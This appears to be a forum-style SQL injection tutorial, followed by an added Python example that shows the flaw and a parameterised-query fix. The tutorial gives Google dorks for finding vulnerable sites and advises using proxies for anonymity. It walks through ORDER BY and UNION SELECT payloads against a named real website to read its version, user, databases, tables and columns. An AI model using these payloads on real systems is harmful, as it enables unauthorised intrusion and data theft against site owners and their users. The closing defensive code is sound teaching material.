SQL (Structured Query Language) Injection | Tutorial

Note: Remember, you can't do well in SQLi without proper knowledge of SQL.

Tools Needed:
Hack Bar = just download this from the Mozilla Firefox add-ons
Dorks = used in dorking for targets
Fingers = for typing
VPN, Proxies, Anonymizers
BRAIN

This guide covers:
1st. Finding vulnerable sites
2nd. Finding number of columns
3rd. Getting info, e.g. version, user, database
4th. Getting databases
5th. Getting tables
6th. Getting columns and extracting data

Some of the Google dorks:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=

1st. Finding vulnerable sites

Type this in Google,
e.g. inurl:news.php?id=
Screenshot: http://i31.photobucket.com/albums/c374/Sp4nkstaPH/SQLI/1_zpsdf587c3c.png

Okay, now we have this target:
Code: http://www.irishsanghatrust.ie/news.php?id=33

2nd. Finding number of columns

To get the number of columns, we use the "order by" query. OK, let's try:
http://www.irishsanghatrust.ie/news.php?id=33 order by 1-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 2-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 3-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 4-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 15-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 19-- => error
http://www.irishsanghatrust.ie/news.php?id=33 order by 18-- => no error

So this means that the target has a total of 18 columns.

To get the columns and make them show up in the web page, we will use the "UNION SELECT" query.
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Note: If no vulnerable columns show up, null the parameter, or just add "-" before the parameter.

3rd. Getting info, e.g. version, user, database

There are different variables for finding and extracting data, but this only covers the basics. We will only use:
@@version
@@user
@@database

If the three above don't work, try these:

version()
user()
database()

To execute this syntax, we use CONCAT.

Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,CONCAT(user(),0x3a3a,version(),0x3a3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

4th. Getting Databases.

Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,GROUP_CONCAT(SCHEMA_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM INFORMATION_SCHEMA.SCHEMATA--

5th. Getting Tables

In order to find tables we will use "GROUP_CONCAT" with "from information_schema.tables where table_schema=database()--".

If you're getting tables from a specific database like "information_schema",
then just change the syntax to this:
"from information_schema.tables where table_schema=0xinformation_schema--"

Don't forget hexing, because sometimes it does not work when magic quotes are on.

Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,GROUP_CONCAT(TABLE_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.TABLES+where+table_SCHEMA=DATABASE()--

6th. Getting Columns and Extracting

So, the final and exciting part, don't know about you :P

Now in this part we are extracting data from column "pages".

Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,GROUP_CONCAT(column_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+table_name=0x7061676573--

Okay, good. Now that you've got it, all you need to do is familiarize yourself with it, from step 1 to the last.

Thanks for viewing/reading the tut. Hope this helps.
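
Why every step above works, and what stops it, as an added example that is not part of the original tutorial: the id parameter is pasted into the SQL text, so the fix is to accept only an integer and bind it as a parameter. Assumptions: SQLite stands in for MySQL so the block runs offline, and the table names, column names and rows are constructed.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the site's database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (name TEXT, pw_hash TEXT);
        INSERT INTO news  VALUES (33, 'Retreat dates', 'Details to follow');
        INSERT INTO users VALUES ('admin', 'constructed-hash-value');
    """)
    return db

def news_vulnerable(db, raw_id):
    # Root cause: the request parameter is concatenated into the SQL text,
    # so everything after the number is parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def news_hardened(db, raw_id):
    # Fix 1: accept only a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    # Fix 2: bind the value; it is passed as data and never parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def probe(fn, db, raw_id):
    """Run a lookup and report rows or the database error, as a page would."""
    try:
        return ("rows", fn(db, raw_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))

# Constructed inputs in the shape of the requests shown above.
COLUMN_PROBE = "33 order by 4--"
UNION_PROBE = "-33 UNION SELECT 1, name, pw_hash FROM users--"

if __name__ == "__main__":
    db = make_db()
    for raw in ("33", COLUMN_PROBE, UNION_PROBE):
        print(repr(raw))
        print("  vulnerable:", probe(news_vulnerable, db, raw))
        print("  hardened:  ", probe(news_hardened, db, raw))
```

The vulnerable lookup leaks the column count through the ORDER BY error and returns the users row through the UNION; the hardened lookup returns nothing for both and still serves id 33.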
